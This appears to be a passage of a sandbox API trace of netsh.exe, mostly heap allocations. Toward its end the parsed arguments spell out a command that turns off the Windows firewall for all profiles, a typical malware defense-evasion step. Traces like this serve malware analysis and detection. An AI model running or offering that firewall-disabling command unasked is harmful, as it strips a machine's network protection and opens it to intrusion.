0x0 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309730 [0220.701] GetProcessHeap () returned 0x2c0000 [0220.701] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec0b0 | out: hHeap=0x2c0000) returned 1 [0220.701] RegisterContext () returned 0x0 [0220.701] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x310) returned 0x326040 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312ec0 | out: hHeap=0x2c0000) returned 1 [0220.702] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x380) returned 0x326360 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326040 | out: hHeap=0x2c0000) returned 1 [0220.702] RegisterContext () returned 0x0 [0220.702] GetProcessHeap () returned 0x2c0000 [0220.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x540) returned 0x3266f0 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0220.703] RegisterContext () returned 0x0 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5b0) returned 0x325b60 [0220.703] GetProcessHeap () returned 0x2c0000 [0220.703] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3266f0 | out: hHeap=0x2c0000) returned 1 [0220.725] RegisterContext () returned 0x0 [0220.725] GetProcessHeap () returned 0x2c0000 [0220.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x620) returned 0x3266f0 [0220.725] GetProcessHeap () returned 0x2c0000 [0220.725] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0220.726] RegisterContext () returned 0x0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec0b0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0220.726] RegisterContext () returned 0x0 [0220.726] GetProcessHeap () returned 0x2c0000 [0220.726] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x690) returned 0x325b60 [0220.727] GetProcessHeap () returned 0x2c0000 [0220.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3266f0 | out: hHeap=0x2c0000) returned 1 [0220.971] RegisterContext () returned 0x0 [0220.972] GetProcessHeap () returned 0x2c0000 [0220.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x700) returned 0x330890 [0220.972] GetProcessHeap () returned 0x2c0000 [0220.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x325b60 | out: hHeap=0x2c0000) returned 1 [0221.654] RegisterContext () returned 0x0 [0221.654] GetProcessHeap () returned 0x2c0000 [0221.654] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0221.654] GetProcessHeap () returned 0x2c0000 [0221.654] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0221.664] RegisterContext () returned 0x0 [0221.664] GetProcessHeap () returned 0x2c0000 [0221.664] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309cd0 [0221.664] GetProcessHeap () returned 0x2c0000 [0221.664] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0221.665] RegisterContext () returned 0x0 [0221.665] GetProcessHeap () returned 0x2c0000 [0221.665] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x770) returned 0x346b80 [0221.666] GetProcessHeap () returned 0x2c0000 [0221.666] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x330890 | out: hHeap=0x2c0000) returned 1 [0221.666] RegisterContext () returned 0x0 [0221.666] GetProcessHeap () returned 0x2c0000 [0221.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0221.667] RegisterContext () returned 0x0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x309dc0 [0221.667] GetProcessHeap () returned 0x2c0000 [0221.667] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0221.667] RegisterContext () returned 0x0 [0221.667] RegisterContext () returned 0x0 [0221.668] RegisterContext () returned 0x0 [0221.668] GetProcessHeap () returned 0x2c0000 [0221.668] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7e0) returned 0x347300 [0221.668] GetProcessHeap () returned 0x2c0000 [0221.668] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346b80 | out: hHeap=0x2c0000) returned 1 [0222.024] RegisterContext () returned 0x0 [0222.024] GetProcessHeap () returned 0x2c0000 [0222.024] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x347f10 [0222.025] GetProcessHeap () returned 0x2c0000 [0222.025] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347300 | out: hHeap=0x2c0000) returned 1 [0222.025] RegisterContext () returned 0x0 [0222.025] GetProcessHeap () returned 0x2c0000 [0222.025] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x346da0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f10 | out: hHeap=0x2c0000) returned 1 [0222.026] RegisterContext () returned 0x0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0222.026] GetProcessHeap () returned 0x2c0000 [0222.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0222.909] RegisterContext () returned 0x0 [0222.909] GetProcessHeap () returned 0x2c0000 [0222.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x347f40 [0223.035] GetProcessHeap () returned 0x2c0000 [0223.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0223.035] RegisterContext () returned 0x0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x347670 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f40 | out: hHeap=0x2c0000) returned 1 [0223.036] RegisterContext () returned 0x0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c0) returned 0x3477d0 [0223.036] GetProcessHeap () returned 0x2c0000 [0223.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347670 | out: hHeap=0x2c0000) returned 1 [0223.036] RegisterContext () returned 0x0 [0223.037] GetProcessHeap () returned 0x2c0000 [0223.037] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0223.037] GetProcessHeap () returned 0x2c0000 [0223.037] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.038] RegisterContext () returned 0x0 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x347f40 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.038] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ec4b0 | out: hHeap=0x2c0000) returned 1 [0223.038] RegisterContext () returned 0x0 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x150) returned 0x347670 [0223.038] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x347f40 | out: hHeap=0x2c0000) returned 1 [0223.039] RegisterContext () returned 0x0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec4b0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.039] RegisterContext () returned 0x0 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec530 [0223.039] GetProcessHeap () returned 0x2c0000 [0223.039] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0223.040] RegisterContext () returned 0x0 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x930) returned 0x349f10 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x346da0 | out: hHeap=0x2c0000) returned 1 [0223.040] RegisterContext () returned 0x0 [0223.040] GetProcessHeap () returned 0x2c0000 [0223.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a0) returned 0x34a850 [0223.041] GetProcessHeap () returned 0x2c0000 [0223.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x349f10 | out: hHeap=0x2c0000) returned 1 [0225.859] RegisterContext () returned 0x0 [0225.859] GetProcessHeap () returned 0x2c0000 [0225.859] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa10) returned 0x34f180 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.860] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a850 | out: hHeap=0x2c0000) returned 1 [0225.860] RegisterContext () returned 0x0 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x2ec6b0 [0225.860] GetProcessHeap () returned 0x2c0000 [0225.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x2c0000) returned 1 [0225.863] SetConsoleCtrlHandler (HandlerRoutine=0xc99198, Add=1) returned 1 [0225.863] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x77940000 [0225.864] GetProcAddress (hModule=0x77940000, lpProcName="SetThreadUILanguage") returned 0x77956d40 [0225.864] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0225.870] FreeLibrary (hLibModule=0x77940000) returned 1 [0225.872] _wcsicmp (_String1="advfirewall", _String2="-?") returned 52 [0225.872] _wcsicmp (_String1="advfirewall", _String2="-h") returned 52 [0225.872] _wcsicmp (_String1="advfirewall", _String2="?") returned 34 [0225.872] _wcsicmp (_String1="advfirewall", _String2="/?") returned 50 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-v") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-a") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-c") returned 52 [0225.879] _wcsicmp (_String1="advfirewall", _String2="-f") returned 52 [0225.883] _wcsicmp (_String1="advfirewall", _String2="-r") returned 52 [0225.885] _wcsicmp (_String1="advfirewall", _String2="-u") returned 52 [0225.885] _wcsicmp (_String1="advfirewall", _String2="-p") returned 52 [0225.885] GetVersionExW (in: lpVersionInformation=0x147520*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x147520*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.888] _vsnwprintf (in: _Buffer=0xca5b80, _BufferCount=0x103, _Format="%d.%d.%d", _ArgList=0x1474e8 | out: _Buffer="6.1.7601") returned 8 [0225.921] _vsnwprintf (in: _Buffer=0xca5fa0, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="7601") returned 4 [0225.921] _vsnwprintf (in: _Buffer=0xca5d90, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="1") returned 1 [0225.921] _vsnwprintf (in: _Buffer=0xca61b0, _BufferCount=0x103, _Format="%d", _ArgList=0x1474e8 | out: _Buffer="0") returned 1 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a990 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9b0 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.921] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x33a9d0 [0225.921] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9f0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x33aa10 [0225.922] wcscpy_s (in: _Destination=0x33aa10, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9b0 | out: hHeap=0x2c0000) returned 1 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9b0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32ea80 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa30 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa50 [0225.922] wcscpy_s (in: _Destination=0x33aa50, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a880 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.922] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x307390 [0225.922] wcscpy_s (in: _Destination=0x307390, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0225.922] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8a0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8c0 [0225.923] wcscpy_s (in: _Destination=0x34a8c0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8e0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a900 [0225.923] wcscpy_s (in: _Destination=0x34a900, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a920 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073b0 [0225.923] wcscpy_s (in: _Destination=0x3073b0, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a940 [0225.923] wcscpy_s (in: _Destination=0x34a940, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa50 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.923] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa30 | out: hHeap=0x2c0000) returned 1 [0225.923] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa30 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33aa50 [0225.924] wcscpy_s (in: _Destination=0x33aa50, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a940 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9d0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x33a9d0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073c0 [0225.924] wcscpy_s (in: _Destination=0x3073c0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307390 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a880 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a880 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a940 [0225.924] wcscpy_s (in: _Destination=0x34a940, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8c0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.924] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8a0 | out: hHeap=0x2c0000) returned 1 [0225.924] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8a0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a8c0 [0225.925] wcscpy_s (in: _Destination=0x34a8c0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a900 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a8e0 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a8e0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x307390 [0225.925] wcscpy_s (in: _Destination=0x307390, _SizeInWords=0x4, _Source="off" | out: _Destination="off") returned 0x0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3073b0 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x34a920 | out: hHeap=0x2c0000) returned 1 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x34b7f0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a920 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a900 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073b0 [0225.925] GetProcessHeap () returned 0x2c0000 [0225.925] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a960 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a980 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073d0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34a9a0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34a9a0, Size=0xe) returned 0x34a9c0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34a9c0, Size=0x24) returned 0x346000 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x346000, Size=0x26) returned 0x346030 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x346030, Size=0x2c) returned 0x34b830 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34b830, Size=0x2e) returned 0x34b870 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x34b870, Size=0x44) returned 0x32d3f0 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32d3f0, Size=0x46) returned 0x32d440 [0225.926] GetProcessHeap () returned 0x2c0000 [0225.926] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32d440, Size=0x50) returned 0x32ea80 [0225.927] GetProcessHeap () returned 0x2c0000 [0225.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32ea80, Size=0x52) returned 0x32eb40 [0225.927] GetProcessHeap () returned 0x2c0000 [0225.927] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x32eb40, Size=0x58) returned 0x32ea80 [0225.969] GetProcessHeap () returned 0x2c0000 [0225.969] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea80 | out: hHeap=0x2c0000) returned 1 [0225.969] _wcsnicmp (_String1="advfirewall", _String2="dump", _MaxCount=0xb) returned -3 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="help", _MaxCount=0xb) returned -7 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="?", _MaxCount=0xb) returned 34 [0225.972] _wcsnicmp (_String1="advfirewall", _String2="exec", _MaxCount=0xb) returned -4 [0225.975] _wcsnicmp (_String1="advfirewall", _String2="advfirewall", _MaxCount=0xb) returned 0 [0225.975] GetProcessHeap () returned 0x2c0000 [0225.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9c0 [0225.975] GetProcessHeap () returned 0x2c0000 [0225.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9a0 [0225.997] GetProcessHeap () returned 0x2c0000 [0225.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32ea80 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34a9e0 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.004] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34aa00 [0226.004] wcscpy_s (in: _Destination=0x34aa00, _SizeInWords=0x6, _Source="netsh" | out: _Destination="netsh") returned 0x0 [0226.004] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa20 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa40 [0226.005] wcscpy_s (in: _Destination=0x34aa40, _SizeInWords=0xc, _Source="advfirewall" | out: _Destination="advfirewall") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa60 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3073e0 [0226.005] wcscpy_s (in: _Destination=0x3073e0, _SizeInWords=0x4, _Source="set" | out: _Destination="set") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aa80 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aaa0 [0226.005] wcscpy_s (in: _Destination=0x34aaa0, _SizeInWords=0xc, _Source="allprofiles" | out: _Destination="allprofiles") returned 0x0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x34aac0 [0226.005] GetProcessHeap () returned 0x2c0000 [0226.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x34aae0 [0226.006] wcscpy_s (in: _Destination=0x34aae0, _SizeInWords=0x6, _Source="state" | out: _Destination="state") returned 0x0 [0226.006] GetProcessHeap () returned 0x2c0000 